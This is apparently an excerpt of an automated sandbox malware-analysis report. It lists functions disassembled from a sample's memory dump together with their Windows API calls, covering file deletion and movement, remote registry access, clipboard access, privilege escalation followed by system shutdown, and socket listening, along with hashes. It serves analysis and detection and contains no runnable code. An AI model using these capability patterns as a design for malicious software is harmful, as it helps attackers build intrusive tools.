                                                                                                                                                                                                                                          Function 0014698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 001469BE
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00146A12
                                                                                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00146A4E
                                                                                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00146A75
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00146AB2
                                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00146ADF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                          • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                          • Opcode ID: 75bd7af746aadd6512b62c853b6bb3d6c236745ce890a2745f234db04ce7469a
                                                                                                                                                                                                                                          • Instruction ID: 227ef41ebc42e5dbeca70394608c2e26d6e30c5578db90a96c4df1091e6757ce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75bd7af746aadd6512b62c853b6bb3d6c236745ce890a2745f234db04ce7469a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1D14171508340AEC714EBA4C891EEBB7ECAF89704F44491EF589D7292EB74DA44CB72
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00149642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00149663
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 001496A1
                                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 001496BB
                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 001496D3
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001496DE
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 001496FA
                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0014974A
                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(00196B7C), ref: 00149768
                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00149772
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0014977F
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0014978F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                                                                          • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                          • Opcode ID: 7507130e87c23eeaa00fa565832129b2629c42954475565241410d53601dd55f
                                                                                                                                                                                                                                          • Instruction ID: c02efdabfc78eca4df62dc50b0b54a7c241a671cab6ff32146f9617e4140d46e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7507130e87c23eeaa00fa565832129b2629c42954475565241410d53601dd55f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7831BF326012196ADF14EFB4DC08AEF77ACAF09321F144166E955E21A0EB74DE808FA4
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0014979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 001497BE
                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00149819
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00149824
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00149840
                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00149890
                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(00196B7C), ref: 001498AE
                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 001498B8
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001498C5
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001498D5
                                                                                                                                                                                                                                            • Part of subcall function 0013DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0013DB00
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                                                                          • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                          • Opcode ID: b91742d00fcb5a295bf3edd4ca961b83b86a721d34845fa9452f430bffa9f815
                                                                                                                                                                                                                                          • Instruction ID: 93533a5bb04237abe2e625d964fc811e0c200d582aac7b313db2a9e5219ba025
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b91742d00fcb5a295bf3edd4ca961b83b86a721d34845fa9452f430bffa9f815
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD31E43160021E6EDF10EFB8EC48AEF77ACAF06320F144156F954A21A1DB74DE85CB60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0015BE44 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0015B6AE,?,?), ref: 0015C9B5
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015C9F1
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015CA68
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015CA9E
                                                                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0015BF3E
                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0015BFA9
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0015BFCD
                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0015C02C
                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0015C0E7
                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0015C154
                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0015C1E9
                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0015C23A
                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0015C2E3
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0015C382
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0015C38F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3102970594-0
                                                                                                                                                                                                                                          • Opcode ID: 529b40cefb796256bc91ba7eaaef625751c264554cb6e4a4bfa1530f92b44ae5
                                                                                                                                                                                                                                          • Instruction ID: 7e32d56e8a0253e36f2cab706b7bc1d777e04d1dfd4ebbea4a6a33fa5e49c3f2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 529b40cefb796256bc91ba7eaaef625751c264554cb6e4a4bfa1530f92b44ae5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E023A71604300DFD714DF28C895E2ABBE5AF89304F58849DF85A9F2A2D731ED45CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000D3A97,?,?,000D2E7F,?,?,?,00000000), ref: 000D3AC2
                                                                                                                                                                                                                                            • Part of subcall function 0013E199: GetFileAttributesW.KERNEL32(?,0013CF95), ref: 0013E19A
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0013D122
                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0013D1DD
                                                                                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0013D1F0
                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 0013D20D
                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0013D237
                                                                                                                                                                                                                                            • Part of subcall function 0013D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0013D21C,?,?), ref: 0013D2B2
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?), ref: 0013D253
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0013D264
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                                                                          • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                          • Opcode ID: 516cf734de4b8b7500adf121ecc21bcb3615f27ee7afe3cd44be916df4ef00e7
                                                                                                                                                                                                                                          • Instruction ID: 175d79d136e353f866624e317bb06f42e4a183920e3d8812d28ba0a838af9315
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 516cf734de4b8b7500adf121ecc21bcb3615f27ee7afe3cd44be916df4ef00e7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30613D3190120D9BCF05EBE0EE929EEB7B5AF55300F644166E44277292EB315F09DB61
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0014ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1737998785-0
                                                                                                                                                                                                                                          • Opcode ID: b8ba4273909bc053b5baae1c825eab24139ecb84775620ad845dd997911205dc
                                                                                                                                                                                                                                          • Instruction ID: d7072ffa7cb0f08ee53ba01fa5154e8da233c388be7bfdcb52c0ebf114a93ca4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8ba4273909bc053b5baae1c825eab24139ecb84775620ad845dd997911205dc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB418A35604611AFE720DF15D888B69BBE1FF44328F148099E85A8BB72C775EC82CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 001316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0013170D
                                                                                                                                                                                                                                            • Part of subcall function 001316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0013173A
                                                                                                                                                                                                                                            • Part of subcall function 001316C3: GetLastError.KERNEL32 ref: 0013174A
                                                                                                                                                                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 0013E932
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                          • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                          • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                          • Opcode ID: 556c91be713f0153f95a4aad4500df8edb31d47a5d72b4de0f1d46293893bbec
                                                                                                                                                                                                                                          • Instruction ID: f21192aab33ca0cf935c3a4d9e37ae4d8c4a0845e8340cb88ba5368d5866519e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 556c91be713f0153f95a4aad4500df8edb31d47a5d72b4de0f1d46293893bbec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE01D672610311ABEB5826B49C86BBB729CA714768F164422FC03E21D1D7A05C8087E0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00151204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00151276
                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00151283
                                                                                                                                                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 001512BA
                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 001512C5
                                                                                                                                                                                                                                          • closesocket.WSOCK32(00000000), ref: 001512F4
                                                                                                                                                                                                                                          • listen.WSOCK32(00000000,00000005), ref: 00151303
                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 0015130D
                                                                                                                                                                                                                                          • closesocket.WSOCK32(00000000), ref: 0015133C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 540024437-0
                                                                                                                                                                                                                                          • Opcode ID: fd73bd71352e7f1cca94d89625dd57ba401ba46703b7e273767eafd97a76203b
                                                                                                                                                                                                                                          • Instruction ID: 7794c1b205baac48b6ca97a14185782db55b4f97582abd85c8b997ace1d93f27
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd73bd71352e7f1cca94d89625dd57ba401ba46703b7e273767eafd97a76203b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A419331600201EFD711DF24C484B69BBE6BF86319F298199D8668F396C775EC85CBE1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0010B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010B9D4
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010B9F8
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010BB7F
                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00173700), ref: 0010BB91
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,001A121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0010BC09
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,001A1270,000000FF,?,0000003F,00000000,?), ref: 0010BC36
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010BD4B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 314583886-0
                                                                                                                                                                                                                                          • Opcode ID: a6c325a4fd1e9d5ec506361f8e0cd297481cd872f562aa7483fe81883206dffd
                                                                                                                                                                                                                                          • Instruction ID: 4eab94de5d9867fda000af301a0f089ce4a43ccf949d30e5d8e4e510c03aa5f0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6c325a4fd1e9d5ec506361f8e0cd297481cd872f562aa7483fe81883206dffd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0C13A75A08209AFDB24DF788CC1BAABBB8EF52310F24419AE4D4D72D1DBB09E41C750
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000D3A97,?,?,000D2E7F,?,?,?,00000000), ref: 000D3AC2
                                                                                                                                                                                                                                            • Part of subcall function 0013E199: GetFileAttributesW.KERNEL32(?,0013CF95), ref: 0013E19A
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0013D420
                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 0013D470
                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0013D481
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0013D498
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0013D4A1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                                                                          • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                          • Opcode ID: 8d39b9c6759bb182c5e01755a733aa69d68e91e854b8c610dfbdd01e7dd783a4
                                                                                                                                                                                                                                          • Instruction ID: 9f91e2852e2c2e79efa0ced4e77d4732199dcffcb85a8211c37155bc7df06fe0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d39b9c6759bb182c5e01755a733aa69d68e91e854b8c610dfbdd01e7dd783a4
